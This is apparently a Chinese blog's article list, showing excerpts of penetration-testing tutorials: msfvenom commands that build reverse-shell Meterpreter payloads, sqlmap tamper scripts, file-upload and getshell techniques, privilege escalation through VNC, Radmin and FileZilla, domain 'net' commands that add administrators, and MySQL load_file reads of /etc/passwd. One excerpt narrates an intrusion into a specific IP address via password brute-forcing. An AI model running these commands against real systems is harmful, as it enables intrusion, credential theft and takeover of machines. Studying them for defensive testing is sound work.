
小白
文章平均质量分 78
L_lemo004
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
基础
基础一、常用术语脚本(asp,php,jsp)html(css,js,html)HTTP协议CMS(B/S)MD5信息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位的散列值(hash value),用于确保信息传输完整一致。抓鸡利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为。跳板使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息。一句话通原创 2020-10-20 23:59:44 · 567 阅读 · 0 评论 -
MSF命令大全
0x00 Payload生成Windows/LinuxWindows:msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名WebPHP:msfvenom -p php/meter原创 2020-10-20 23:59:00 · 6394 阅读 · 0 评论 -
命令执行漏洞
命令执行漏洞漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常命令中,从而造成命令执行攻击。PHP执行命令是继承WebServer用原创 2020-10-20 23:58:12 · 1435 阅读 · 0 评论 -
sqlmap常用绕过脚本
使用方法–tamper xxx.pyapostrophemask.py用UTF-8全角字符替换单引号字符apostrophenullencode.py用非法双字节unicode字符替换单引号字符appendnullbyte.py在payload末尾添加空字符编码base64encode.py对给定的payload全部字符使用Base64编码between.py分别用“NOTBETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”bluec原创 2020-10-20 23:57:37 · 1452 阅读 · 0 评论 -
MSF常用命令
Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。Msfconsole 开启msfMsfconsole -h 协助选择项Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数控制模块详细介绍:Exploits 渗入进攻控制模块 主要用于进攻方式Auxiliary 輔助控制模块 主要用于信息内容搜集Payloa原创 2020-10-20 23:56:41 · 2771 阅读 · 0 评论 -
浅析文件上传漏洞
文章目录文件上传成因客户端校验服务器校验原理危害防御解析漏洞文件上传成因对于上传文件的后缀名(扩展名)没有做较为严格的限制对于上传文件的MIMETYPE 没有做检查权限上没有控制对于上传的文件的文件权限,(尤其是对于shebang类型的文件)对于web server对于上传文件或者指定目录的行为没有做限制客户端校验前段js验证可通过审计修改js代码或burp改包绕过服务器校验content-type字段校验将Content-Type修改为image/gif,或者原创 2020-10-20 23:50:44 · 519 阅读 · 0 评论 -
PHP网页常见漏洞
PHP网页的安全性问题针对PHP的网站主要存在下面几种攻击方式:1.命令注入(Command Injection)2.eval注入(Eval Injection)3.客户端脚本攻击(Script Insertion)4.跨网站脚本攻击(Cross Site Scripting, XSS)5.SQL注入攻击(SQL injection)6.跨网站请求伪造攻击(Cross Site Re...原创 2019-07-20 21:19:13 · 2224 阅读 · 0 评论 -
深入浅出之IIS短文件名漏洞
一、 什么是IISInternet Information Services(IIS,以前称为Internet Information Server)互联网信息服务是Microsoft公司提供的可扩展Web服务器,支持HTTP,HTTP/2,HTTPS,FTP,FTPS,SMTP和NNTP等。起初用于Windows NT系列,随后内置在Windows 2000、Windows XP Profe...转载 2019-07-09 21:11:09 · 4801 阅读 · 0 评论 -
内网渗透之一次域环境的渗透测试
0x01 寻找后台IP:39.106.226.95:9235进入网页,是一个html网站使用御剑扫描一下发现robots.txt文件,管理员经常将后台地址保存在此文件中发现后台地址果然被保存在此文件中访问进入后台尝试抓包进行爆破成功跑出后台登录密码 passw0rd登录后台,选择全功能版成功进入后台0x02 文件上传首页处显示为IIS6.0搭建,可以利用II...原创 2019-07-12 22:52:11 · 856 阅读 · 1 评论 -
MySQL操作
连接数据库 mysql -hlocalhost -uroot -puse haha 使用哈哈数据库show tables 展示所有表增------------------------------------------------------------------------------------------CREATE TABLE 表名 ( 创建表且主键自增id ...原创 2019-07-12 19:46:57 · 245 阅读 · 0 评论 -
metasploit命令
show exploits列出metasploit框架中的所有渗透攻击模块。show payloads列出metasploit框架中的所有攻击载荷。show auxiliary列出metasploit框架中的所有辅助攻击载荷。search name查找metasploit框架中所有的渗透攻击和其他模块。info展示出制定渗透攻击或模块的相关信息。use name装...原创 2019-07-12 19:45:12 · 382 阅读 · 0 评论 -
域名信息收集
域名(Domain Name)由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位。whois用来查询域名的IP以及所有者等信息的传输协议。不同域名后缀的whois信息需要到不同的whois数据库查询,每个域名或IP的whois信息由对应的管理机构保存。whois查询通过whois查询可以获得域名注册者邮箱地址等信息。...原创 2019-07-12 19:36:11 · 513 阅读 · 0 评论 -
网站后台getshell的方法总结
方法一:直接上传getshell以dedecms为例,后台可以直接上传脚本文件,从而getshell,具体方法如下:即可成功上传大马,并成功执行,从而拿下webshell。坑:通常由于权限限制,导致只有该目录权限,无法进入其他目录,此时便可以采用…/跳转到根目录,或者其他目录,此时所采用的方法是如下的文件改名方法二:数据库备份getshell以南方数据cms为例:1,首先上传一张图片马...原创 2019-07-12 19:27:46 · 6147 阅读 · 0 评论 -
Radmin提权
radmin是平时在windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等特性。不过老版本的radmin server2.X、radmin server3.0都存在一个“致命”漏洞 —— radmin hash提权漏洞。 对于该...原创 2019-06-03 22:47:14 · 1799 阅读 · 0 评论 -
vnc提权
提权思路:利用在安装VNC后会在注册表中保留VNC的密码,通过WEBSHELL远程读取HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 的密码信息并在本地编辑破解VNC密码来达到提权目的。通过读取注册表十进制数转换成十六进制数破解十六进制数得到密码CMD输入 vncx4.exe -W 回车输入转换后的十六进制数使用获取到...原创 2019-06-03 22:58:19 · 1096 阅读 · 0 评论 -
爆网站绝对路径方法
爆网站绝对路径方法1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。Eg:www.xxx.com/news.php?id=149’2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。Eg:www.xxx.com/researcharchive.php?id=-13、Google爆...原创 2019-06-25 15:54:55 · 1555 阅读 · 0 评论 -
通过共享文件逻辑漏洞渗透wordpress
扫描IP这里我的内网网段为31网段,所有我们使用ipscan扫描31网段,发现疑似站点IP192.168.31.236,成功访问扫描端口确定IP后查看其开放了哪些端口开放了22,80,139,445,3306,6667尝试爆破22端口弱口令...原创 2019-06-25 20:11:09 · 846 阅读 · 0 评论 -
常见代码执行函数
常见代码执行函数,如eval()assert()preg_replace()create_function()array_map()call_user_func()call_user_func_array()array_filterusortuasort()文件操作函数动态函数(a(a(a(b))1、eval()eval() 函数把字...原创 2019-07-12 19:13:15 · 6274 阅读 · 0 评论 -
域渗透DOS命令
net group /domain//获得所有域用户组列表net localgroup administrators 用户名 /add 将用户添加至管理组net group qq_group /domain//显示域中qq_group组的成员net group qq_group /del /domain//删除域中qq_group组net group qq_group qq /...原创 2019-07-12 19:14:14 · 723 阅读 · 0 评论 -
MySQL数据库写入一句话
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看一个PHP文件...原创 2019-07-12 19:16:13 · 1956 阅读 · 0 评论 -
ASP网站渗透
1.注入攻击And 1=1 1=2Order by xxUnion select 1,2,列名,… From 表名2.未验证的上传页面经典上传截取拿shell(修改当前页面的参数,达到伪造恶意攻击)经典上传抓包拿shell(抓数据包,利用工具去自动判断验证方式,修改并上传)3.万能密码与登陆框注入'or'='or' 真条件绕过不安全的过滤机制登陆框输入注入语句查询利用(不安全的过...原创 2019-07-12 19:20:39 · 2355 阅读 · 0 评论 -
爆网站绝对路径方法
1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。Eg:www.xxx.com/news.php?id=149’2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。Eg:www.xxx.com/researcharchive.php?id=-13、Google爆路径说明:结合关...原创 2019-07-12 19:22:30 · 5246 阅读 · 1 评论 -
Filezilla提权
Filezilla提权目录一般在program files中program files中点击filezilla server interface.xml 接口文件从这个文件文件我们可以看出密码为空,filezilla的默认监听端口为本地的14147端口,利用前我们需查看14147端口是否开启netstat -ano由于filezilla使用的是本地的14147端口,所以我们需要...原创 2019-06-03 22:29:18 · 1303 阅读 · 0 评论